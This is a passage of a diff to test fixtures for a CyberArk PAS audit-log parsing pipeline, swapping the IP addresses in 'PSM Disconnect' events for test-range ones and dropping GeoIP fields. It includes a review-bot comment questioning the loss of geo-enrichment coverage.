set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", 
@@ -966,39 +890,18 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "34.123.103.115",
 "user": {
 "name": "testark"
 },
- "ip": "34.123.103.115"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
 "user": {
 "name": "Administrator"
 },
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1015,7 +918,7 @@
 },
 "@timestamp": "2021-03-14T13:51:35.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark"
+ "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark"
 },
 "ecs": {
 "version": "1.12.0"
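Review bot: The new expected output removes the `destination.geo` and `source.geo` objects outright instead of carrying geo data for the replacement addresses, so this fixture no longer asserts anything about the pipeline's GeoIP enrichment of `67.43.156.15` and `67.43.156.13`. If the replacement addresses were picked from the range the test GeoIP database covers, enrichment would be expected to appear here, and its absence may mean the expected file was regenerated against a stack without that database; confirm which is intended before merging. The same removal appears in the hunk at `@@ -1104,39 +1006,18 @@`.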
@@ -1026,16 +929,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:51:35Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n 
\u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { 
@@ -1047,14 +949,14 @@
 "application_type": "PSMP-SSH",
 "psmid": "PSMServer",
 "session_id": "47747796-03e1-4a11-af39-ab56c00e7732",
- "src_host": "81.32.170.205",
- "dst_host": "34.123.103.115",
+ "src_host": "67.43.156.13",
+ "dst_host": "67.43.156.15",
 "session_duration": "00:00:54"
 },
 "rfc5424": true,
 "ca_properties": {
 "other": {},
- "address": "34.123.103.115",
+ "address": "67.43.156.15",
 "creation_method": "PVWA",
 "cpm_status": "failure",
 "policy_id": "UnixSSH",
@@ -1066,9 +968,9 @@
 "reset_immediately": "ReconcileTask",
 "last_task": "ReconcileTask"
 },
- "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
+ "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark",
 "safe": "partner",
- "station": "34.71.250.247",
+ "station": "67.43.156.15",
 "action": "PSM Disconnect",
 "timestamp": "Mar 14 06:51:35",
 "desc": "PSM Disconnect"
@@ -1080,8 +982,8 @@ "event": { "severity": 2, "duration": 54000000000, - "ingested": "2021-06-09T10:24:31.624814600Z", - "original": "\u003c5\u003e1 2021-03-14T13:51:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:51:35\",\"IsoTimestamp\":\"2021-03-14T13:51:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813812100Z", + "original": "\u003c5\u003e1 2021-03-14T13:51:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n 
\u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:51:35\",\"IsoTimestamp\":\"2021-03-14T13:51:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", 
@@ -1104,39 +1006,18 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "34.123.103.115",
 "user": {
 "name": "testark"
 },
- "ip": "34.123.103.115"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
 "user": {
 "name": "Administrator"
 },
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1153,7 +1034,7 @@
 },
 "@timestamp": "2021-03-15T10:33:30.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark"
+ "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1164,16 +1045,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:33:30Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n 
\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1185,14 +1065,14 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "29f340df-89e9-405a-beae-0216390cda42", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:01:35" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", 
@@ -1202,9 +1082,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 03:33:30", "desc": "PSM Disconnect" 
@@ -1216,8 +1096,8 @@ "event": { "severity": 2, "duration": 95000000000, - "ingested": "2021-06-09T10:24:31.624817Z", - "original": "\u003c5\u003e1 2021-03-15T10:33:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n 